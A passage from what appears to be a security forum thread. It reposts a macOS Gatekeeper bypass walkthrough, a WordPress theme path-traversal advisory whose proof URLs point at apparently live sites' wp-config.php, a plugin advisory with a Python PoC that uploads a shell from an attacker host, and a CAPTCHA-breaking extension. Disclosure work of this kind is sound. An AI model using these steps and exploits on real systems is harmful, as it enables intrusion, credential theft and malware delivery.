Runtime.getRuntime().exec("/usr/bin/touch /tmp/AMPLIASECURITY"); } catch(Exception e) { } } } (This is just an example, of course, arbitrary code can be executed) $ javac AmpliaTest.java Be sure to compile the code for a version of Java lower than or equal to the one available on the target (for example, javac -target 1.6 -source 1.6 AmpliaTest.java; and the compiled code will work on Java versions >= 1.6) . $ echo "main-class: AmpliaTest" > Manifest $ jar cmf Manifest UnsignedCode.jar AmpliaTest.class - Create a .DMG disk image For example: $ hdiutil create -size 5m -fs HFS+ -volname AmpliaSecurity AmpliaTest.dmg - Mount AmpliaTest.dmg - Rename UnsignedCode.jar to UnsignedCode (just remove the extension) - Copy UnsignedCode to the AmpliaSecurity volume - Unmount AmpliaTest.dmg - Host the file AmpliaTest.dmg on a web server - Download AmpliaTest.dmg using Safari and open it - Double-Click on 'UnsignedCode' and the code will be executed bypassing OS X Gatekeeper checks (the code creates the file /tmp/AMPLIASECURITY). (Perform the same steps but without removing the .jar extension to UnsignedCode.jar and OS X Gatekeeper will prevent execution of the Jar file) Because the file 'UnsignedCode' has no extension, Finder will display a blank page icon; the Java/JAR icon will not be displayed. The user does not know he is double-clicking on a JAR file and the file does not look particularly suspicious. Also, since the unsigned code is distributed inside a disk image (.DMG) file, there are many things the attacker can do to gain the trust of the user (include other files, use Finder background images, etc). Source
  21. Aerosol
    |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| |[*] Exploit Title: Wordpress RedSteel Theme Arbitrary File Download Vulnerability | |[*] Google Dork: inurl:wp-content/themes/RedSteel | |[*] Date : Date: 2015-01-25 | |[*] Exploit Author: Ashiyane Digital Security Team | |[*] Vendor Homepage : http://www.webdesignlessons.com/redsteel-wordpress-theme/ | |[*] Tested on: Windows 7 | |[*] Discovered By : ACC3SS | |-------------------------------------------------------------------------| | |[*] Location : [localhost]/wp-content/themes/RedSteel/download.php?file=filename.php | |-------------------------------------------------------------------------|download.php | Vulnerable file : download.php | | Vulnerable code : | <?php $file = @$_GET['file']; $parts = explode('/',$file); $fileName = $parts[sizeof($parts)-1]; if ((isset($file))&&(file_exists($file))) { header("Content-type: application/force-download"); header('Content-Disposition: inline; filename="' . $fileName . '"'); header("Content-Transfer-Encoding: Binary"); header("Content-length: ".filesize($file)); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $fileName . '"'); readfile($file); } ?> | | | | | | |[*] Proof: | |[*] http://dixonpest.com/wp-content/themes/RedSteel/download.php?file=../../../wp-config.php | |[*] http://rmhctallahassee.org/wp-content/themes/RedSteel/download.php?file=download.php | |[*] | | |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| Source
  22. Silviu
    A Firefox (>34) extension that breaks rotld.ro's audio CAPTCHA, with 100% accuracy. Flawed implementation RoTLD's audio CAPTCHAs are composed of 6 characters, in the a-f0-9 range. Each character is concatenated to the audio file, along with a header ("your captcha code is") and random amount of white noise between the characters. The major flaw is that the header, noise and characters are binary concatenated to the file (ie cat header.mp3 a.mp3 1.mp3 6.mp3 noise.mp3 d.mp3 b.mp3 f.mp3 > output.mp3), without resynthesizing the output. One can do a simple binary search for signatures and find the CAPTCHA code. Installation You can install by dragging the latest rotld_captcha.xpi file to your add-on page. Sursa: https://github.com/vladc/RoTLD-Captcha
  23. Aerosol
    Several new versions of PHP have been released, fixing a number of security vulnerabilities and other bugs in the popular scripting language. PHP 5.6.5 is the newest version of the language, and it has patches for a handful of vulnerabilities, including a use-after-free flaw that could lead to remote code execution in some cases. “Sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping’s length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping,” the description of the vulnerability says. There are a few other security vulnerabilities fixed in version 5.6.5, as well. One involves an initialized pointer in Exif. Another is a fix for a vulnerability that initially was patched in December. Apparently the patch did not completely fix the problem, which was identified by researcher Stefan Esser. The vulnerability is another use-after-free bug. “There is a small but important difference to the patch I sent on 10th December. You use zend_symtable_find instead of zend_hash_find from my patch. Because of this change the fix is incomplete. It now detects attacks that try to replace a key like “AAA”, but it does not fix attacks where the key is a numerical string like “123”. The reason for this is that we do not want integer keys in objects. That is why the code was added in the first place,” Esser said in an email to the PHP maintainers. “The object properties are therefore inserted via zend_hash_update, instead of zend_symtable_update. Therefore something like “123” will be inserted as a string and not as a numerical 123. On the attempt to do the overwrite attack you now check with zend_symtable_find(). This function will turn the “123” into a numerical “123” and therefore not see that it is already there. The protection will not be executed and therefore the attack works in the same way as before.” Source
  24. Aerosol
    Mogwai Security Advisory MSA-2015-01 ---------------------------------------------------------------------- Title: WP Pixarbay Images Multiple Vulnerabilities Product: Pixarbay Images (Wordpress Plugin) Affected versions: 2.3 Impact: high Remote: yes Product link: https://wordpress.org/plugins/pixabay-images/ Reported: 14/01/2015 by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) Vendor's Description of the Software: ---------------------------------------------------------------------- Pixabay Images is a WordPress plugin that let's you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required. Business recommendation: ---------------------------------------------------------------------- Update to version 2.4 Vulnerability description: ---------------------------------------------------------------------- 1) Authentication bypass The plugin does not correctly check if the user is logged in. Certain code can be called without authentication 2) Arbitrary file upload The plugin code does not validate the host in the provided download URL, which allows to upload malicious files, including PHP code. 3) Path Traversal Certain values are not sanitized before they are used in a file operation. This allows to store files outside of the "download" folder. 4) Cross Site Scripting (XSS) The generated author link uses unsanitized user values which can be abused for Cross Site Scripting (XSS) attacks. Proof of concept: ---------------------------------------------------------------------- The following PoC Python script can be used to download PHP files from a attacker controlled host. #!/usr/bin/env python import argparse import httplib, urllib from urlparse import urlparse def exploit(target_url, shellcode_url): target = urlparse(target_url) params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url, 'image_user': 'none', 'q':'xxx/../../../../../../mogwai'}) headers = headers = {"Content-type": "application/x-www-form-urlencoded"} print "[+] Sending download request...." conn = httplib.HTTPConnection(target.netloc) conn.request("POST", target.path + "/wp-admin/", params, headers) response = conn.getresponse() response_data = response.read() if response.status != 200 and response_data != "Error: File attachment metadata error": print "[-] Something went wrong" print response_data exit() conn.close() # ---- Main code ---------------- parser = argparse.ArgumentParser() parser.add_argument("target_url", help="The target url, for example http://foo.bar/blog/") parser.add_argument("shellcode_url", help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php") print "----------------------------------------------" print " pixabay upload wordpress plugin exploit PoC" print " Mogwai security" print "----------------------------------------------" arguments = parser.parse_args() exploit(arguments.target_url, arguments.shellcode_url) Vulnerable / tested versions: ---------------------------------------------------------------------- Pixabay Images 2.3 Disclosure timeline: ---------------------------------------------------------------------- 14/01/2014: Reporting issues to the plugin author 15/01/2014: Release of fixed version (2.4) 19/01/2014: Public advisory Advisory URL: ---------------------------------------------------------------------- https://www.mogwaisecurity.de/#lab ---------------------------------------------------------------------- Mogwai, IT-Sicherheitsberatung Muench Steinhoevelstrasse 2/2 89075 Ulm (Germany) info@mogwaisecurity.de Source
  25. Amidamaru
    Hello, Un nene a descoperit cum sa traga followers de pe conturi de twitter, Collecting Twitter Followers with 25 lines of Python, si a scris un script in Python2 dupa cum urmeaza: " import tweepy import time #insert your Twitter keys here consumer_key ='bla bla' consumer_secret='bla bla' access_token='bla bla' access_secret='bla bla' auth = tweepy.auth.OAuthHandler(consumer_key, consumer_secret) auth.set_access_token(access_token, access_secret) api = tweepy.API(auth) list= open('/go-to-war/Desktop/twitter_list.txt','w') if(api.verify_credentials): print 'We sucessfully logged in' user = tweepy.Cursor(api.followers, screen_name="<targeted_twitter_account>").items() while True: try: u = next(user) list.write(u.screen_name +' n') except: time.sleep(15*60) print 'We got a timeout ... Sleeping for 15 minutes' u = next(user) list.write(u.screen_name +' n') list.close() " Intrebarea mea este, l-a incercat cineva si i-a mers? Eu l-am pornit, sta o perioda pana expira cele 15 minute alocate unui interval valid de interogare si pe urma iese cu urmatoarea eroare: "Traceback (most recent call last): File "twitter_followers_harvesting.py", line 28, in <module> u = next(user) File "/usr/lib/python2.7/dist-packages/tweepy/cursor.py", line 110, in next self.current_page = self.page_iterator.next() File "/usr/lib/python2.7/dist-packages/tweepy/cursor.py", line 60, in next cursor=self.next_cursor, *self.args, **self.kargs File "/usr/lib/python2.7/dist-packages/tweepy/binder.py", line 179, in _call return method.execute() File "/usr/lib/python2.7/dist-packages/tweepy/binder.py", line 162, in execute raise TweepError(error_msg, resp) tweepy.error.TweepError: [{'message': 'Sorry, that page does not exist', 'code': 34}] " Merci fain.
×
×
  • Create New...